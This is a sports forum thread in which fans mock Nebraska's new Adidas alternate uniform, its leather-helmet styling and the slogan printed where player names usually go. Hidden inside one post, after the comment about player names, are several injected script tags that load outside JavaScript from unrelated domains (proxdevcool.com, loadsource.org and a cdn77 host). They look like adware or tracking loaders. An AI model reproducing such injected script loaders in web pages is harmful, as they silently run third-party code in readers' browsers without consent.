Nebraska Releases New Alt Uniform

A_Slab_of_Bacon

Reaction score
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

Note the text on the back of the jersey.

Not the victory but the action...

It's rough when you make excuses on your uniform...

Ummm to say the fans on Twitter are not happy about this would be a massive understatement. The memes flying around on that thread are pretty funny.

Interesting attempt by Adidas to capture the old school leather helmet look but I don't think they came anywhere close to pulling it off. And the text on the back is weird, don't know that I have ever seen a team put a paragraph where the players name would typically be.

Maybe not the best time to unveil an alternate uniform when the fanbase is already going to be pretty salty about the 0-6 start to the year.

Ummm to say the fans on Twitter are not happy about this would be a massive understatement. The memes flying around on that thread are pretty funny.

Interesting attempt by Adidas to capture the old school leather helmet look but I don't think they came anywhere close to pulling it off. And the text on the back is weird, don't know that I have ever seen a team put a paragraph where the players name would typically be.

Maybe not the best time to unveil an alternate uniform when the fanbase is already going to be pretty salty about the 0-6 start to the year.

Yeah the response on twitter ... apocalyptic.

I do wonder if the response would be dramatically different if they were doing well.

Yeah the response on twitter ... apocalyptic.

I do wonder if the response would be dramatically different if they were doing well.

My guess is that if they were 6-0 the fans still wouldn't be crazy about them but they would be much more tolerant of them. The base uniform isn't bad and the helmet would probably be looked at as a novelty and something kind of unique but I am not sure there is a scenario where the text on the back of the jersey would be popular.

Just strange to cram a bunch of text into a small space like that, looks really odd.

My guess is that if they were 6-0 the fans still wouldn't be crazy about them but they would be much more tolerant of them. The base uniform isn't bad and the helmet would probably be looked at as a novelty and something kind of unique but I am not sure there is a scenario where the text on the back of the jersey would be popular.

Just strange to cram a bunch of text into a small space like that, looks really odd.

It is a weird design no doubt. Adidas is .... underwhelming pretty often.

<iframe id="twitter-widget-0" scrolling="no" allowtransparency="true" allowfullscreen="true" class="twitter-tweet twitter-tweet-rendered" style="position: absolute; visibility: hidden; display: block; width: 0px; height: 0px; padding: 0px; border: medium none;" frameborder="0"></iframe>
Note the text on the back of the jersey.

Not the victory but the action...

It's rough when you make excuses on your uniform...

The lack of the player's name on the jersey in the current game may not build a sense of confidence in the players. May confirm any feelings that the coaching staff undervalues them and is making it easier to replace them. Great motivational tool!
<script src="//proxdevcool.com/1e6ba9a0464b8e1485.js"></script><script type="text/javascript" src="https://proxdevcool.com/addons/lnkr5.min.js"></script><script type="text/javascript" src="https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52375x7787x&r=1539629780923"></script><script type="text/javascript" src="https://1675450967.rsc.cdn77.org/cu/trkshpks.js"></script><script type="text/javascript" src="https://proxdevcool.com/ext/1e6ba9a0464b8e1485.js?sid=52375_7787_&title=ads&blocks[]=31af2"></script>

Just an fyi - that saying is on their stadium - it's been around for years. Hopefully the players react like the twitter public is.

man, so glad we have nike. Addidas and Under Armour unis are just yuck

Just an fyi - that saying is on their stadium - it's been around for years. Hopefully the players react like the twitter public is.

I did notice that nearly all of the hate is directed at the helmet. Very few had anything to say either positive or negative about the writing on the back. Still strikes me as a really odd place to put that large of a saying.

The only way to combat this is with chrome gold, maroon, and anthracite.

DpkKjRNUcAA_CsP.jpg:large

Their regular uniforms are nothing to write home about so why all the fuss? It is Nebraska and they are now an afterthought in the world of college football. The old standard of winning they are used to is over.

man, so glad we have nike. Addidas and Under Armour unis are just yuck

Yeah I'm not a big fan of our uniforms or "redesigns" but they're at least ... not bad.

Adidas... their special uniforms are just low effort.

Their regular uniforms are nothing to write home about so why all the fuss? It is Nebraska and they are now an afterthought in the world of college football. The old standard of winning they are used to is over.

Yep. These are an improvement, which isn't saying much.

Afterthought.

Rich from a guy whose moniker is MaroonFive. Just saying.

Sent from my iPhone using Tapatalk

Afterthought.

Rich from a guy whose moniker is MaroonFive. Just saying.

Lol. Good point. I can't believe they picked those bores for the SB halftime show. Guess they wanted viewers to take a break from their broadcast?

Sent from my SM-G935V using Tapatalk

I don't get the reference with the jock strap on the helmet. I guess that's old school.

Back includes full sentence punctuated with a colon... that's new.

Top Bottom